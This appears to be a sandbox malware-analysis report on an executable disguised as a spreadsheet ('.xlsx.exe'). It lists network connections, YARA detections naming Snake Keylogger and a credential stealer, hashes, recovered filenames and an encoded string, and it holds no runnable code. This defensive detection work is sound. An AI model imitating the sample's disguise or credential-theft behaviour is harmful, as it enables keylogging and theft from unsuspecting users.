                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Process Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 0_2_02B5D3DC
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BD278
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B5362
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BC146
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BC738
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BC468
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BCA08
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B69A0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BE988
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B3E09
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BCFAA
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B6FC8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BCCD8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B9DE0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B3AA1
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BE97A
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023BF961
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B39EE
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B29EC
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E1E80
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E0B30
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E17A0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E9C18
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E5028
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EFC68
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E9548
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E2968
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EDE00
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EE24A
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EE258
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E1E70
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EE6AF
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EE6B0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EEAF8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EEB08
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E0B20
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EEF51
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EEF60
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E178F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E8BA0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EF3B8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EF802
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E5018
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EF810
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E003F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E0040
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060ECC8F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060ECCA0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060ED0E9
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060ED0F8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060ED540
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060ED550
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060ED999
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060ED9A8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060EDDFF
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_08F81B88
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_08F81B79
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_0908733F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_090866C0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_090866C0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_090D1BF0
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688208679.0000000005620000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1681361916.000000000105E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameriched20.dllp( vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $dq,\\StringFileInfo\\000004B0\\OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000000.1664986249.0000000000A72000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePumoa.exe, vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameExample.dll0 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688025418.0000000005590000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameExample.dll0 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemscorlib.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $dq,\\StringFileInfo\\040904B0\\OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $dq,\\StringFileInfo\\000004B0\\OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Core.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Web.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4138595927.00000000066C9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe | Binary or memory string: OriginalFilenamePumoa.exe, vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.5590000.5.raw.unpack, DarkListView.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, DarkListView.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.5590000.5.raw.unpack, DarkComboBox.cs | Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, DarkComboBox.cs | Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
                    Source: DC74433Y7889021.xlsx.exe, W--.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: DC74433Y7889021.xlsx.exe, W--.cs | Security API names: System.Security.AccessControl.W_26CA_0306.GetAccessControlSectionsFromChanges()
                    Source: DC74433Y7889021.xlsx.exe, -.cs | Security API names: System.Security.AccessControl._0385.GetAccessControlSectionsFromChanges()
                    Source: DC74433Y7889021.xlsx.exe, -.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: DC74433Y7889021.xlsx.exe, .cs | Security API names: System.Security.AccessControl..GetAccessControlSectionsFromChanges()
                    Source: DC74433Y7889021.xlsx.exe, .cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
